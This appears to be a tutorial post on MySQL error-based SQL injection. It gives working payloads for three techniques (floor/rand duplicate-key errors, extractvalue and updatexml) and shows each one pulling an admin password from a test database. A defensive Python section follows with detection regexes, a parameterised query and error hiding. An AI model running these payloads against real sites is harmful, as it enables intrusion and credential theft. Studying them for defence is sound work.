Posting some old notes. When MySQL executes a statement it throws an error message, and php+mysql sites often print that error text straight onto the page, so the three methods below can be constructed to pull out specific data.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following payloads can be used (the first one was missing its opening parenthesis; it is restored here so the brackets balance):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id input is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed in the error. To retrieve other data, replace the version() expression with the subquery you want evaluated.
For example, to retrieve the administrator's username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
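The defensive side of the three methods above, as an added example that is not part of the original post: a routine that flags the floor/rand group-by, extractvalue and updatexml signatures in a request value, a parameterised lookup that keeps an injected tail out of the SQL parser, and an error handler that logs the database message server-side instead of echoing it to the client (the leak every method here depends on). The article table and request values are constructed from the post; sqlite3 stands in for MySQL, which is an assumption.

```python
import re
import sqlite3

# Signatures of the three error-based techniques shown in the post.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
}


def detect_error_based(value: str) -> list[str]:
    """Return the names of error-based injection signatures present in a request value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def public_error_message(db_error: str) -> tuple[str, str]:
    """Split a DB error into what the client sees and what goes to the server log.
    The client never receives the database text, so nothing can be read out of it."""
    return ("An internal error occurred.", f"db_error={db_error}")


def lookup_article(conn: sqlite3.Connection, raw_id: str) -> list[tuple]:
    """Parameterised lookup: raw_id is bound as a value, never spliced into the SQL,
    so a tail such as ' and extractvalue(...)' is compared as text, not executed."""
    return conn.execute("select * from article where id = ?", (raw_id,)).fetchall()


def demo() -> dict:
    """Constructed sample: the post's article row, one benign id and one updatexml payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    benign = "1"
    payload = "1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1))"
    return {
        "benign_hits": detect_error_based(benign),
        "payload_hits": detect_error_based(payload),
        "benign_rows": lookup_article(conn, benign),
        "payload_rows": lookup_article(conn, payload),
        "client_sees": public_error_message("XPATH syntax error: '^$admin888^$'")[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```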
All, thanks foreign guys.